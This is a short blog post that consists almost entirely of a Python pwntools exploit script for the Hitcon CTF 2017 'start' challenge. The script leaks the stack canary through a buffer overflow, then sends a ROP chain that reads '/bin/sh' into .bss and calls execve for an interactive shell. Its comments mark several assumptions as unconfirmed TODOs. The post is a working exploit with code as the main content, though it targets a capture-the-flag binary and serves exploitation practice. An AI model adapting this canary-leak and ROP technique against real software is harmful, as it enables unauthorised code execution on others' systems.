
Hitcon CTF 2017 start

JeonYoungSin 2019. 7. 30. 20:31

exploit.py


from pwn import *


# Exploit script for the Hitcon CTF 2017 "start" challenge, written against
# pwntools in Python 2 syntax (`print` statements, str payloads).  The script
# talks to the target in two rounds: the first input leaks the stack canary,
# the second input carries the recovered canary plus a ROP chain.  Every
# gadget/function address below is hard-coded for this specific binary and is
# not checked at runtime.
p = process("./start")


e = ELF("./start")


# Round 1: 0x20-12 + 4 = 0x20 bytes of filler.  sendline() appends "\n" as a
# 0x21st byte; presumably that byte lands on the canary's low (null) byte so
# the program echoes the canary back — TODO confirm against the binary's
# output routine.
payload = "A"*(0x20-12)

payload += "B"*4


p.sendline(payload)

print p.recvuntil("\n")

# Rebuild the 8-byte canary: the low null byte is restored by hand, the other
# 7 bytes are taken from the leaked output.
canary = "\x00" + p.recv(7)

print p.recv()

sleep(0.2)

# ROP gadget addresses (hard-coded; the names describe the pop sequence).
pop_rax_rdx_rbx = 0x47a6e6

pop_rdi = 0x4005d5

pop_rsi = 0x4017f7

pop_rdx = 0x443776

syscall = 0x4003fc

# Path string later read into .bss and passed to execve; the trailing "\x00"
# makes it an 8-byte NUL-terminated string.
binsh = "/bin/sh\x00"


# Address of read() inside the binary (hard-coded).
read = 0x440300


# Round 2: 0x20-8 bytes of filler, the recovered canary in its slot, then 8
# more bytes — presumably covering the saved rbp before the return address;
# TODO confirm the frame layout.
payload2 = "A"*(0x20-8)

payload2 += canary

payload2 += "C"*8


# Chain part 1: read(0, e.bss(), len(binsh)) — pulls the "/bin/sh\x00" string
# sent at the end of this script into the .bss section.
payload2 += p64(pop_rdi)

payload2 += p64(0)

payload2 += p64(pop_rsi)

payload2 += p64(e.bss())

payload2 += p64(pop_rdx)

payload2 += p64(len(binsh))

payload2 += p64(read)


# Chain part 2: rax=59 (execve on x86-64), rdx=0, rbx=0 (order per the gadget
# name), rsi=0, rdi=&.bss, then syscall -> execve(&.bss, NULL, NULL).
payload2 += p64(pop_rax_rdx_rbx)

payload2 += p64(59)

payload2 += p64(0)

payload2 += p64(0)

payload2 += p64(pop_rsi)

payload2 += p64(0)

payload2 += p64(pop_rdi)

payload2 += p64(e.bss())

payload2 += p64(syscall)



p.sendline(payload2)


print p.recv()

sleep(0.2)

# "exit" presumably makes the program's input loop return so the overwritten
# return address is used — TODO confirm against the binary.
p.sendline("exit")

# Consumed by the read() call in chain part 1 (exactly len(binsh) bytes).
p.send(binsh)

p.interactive()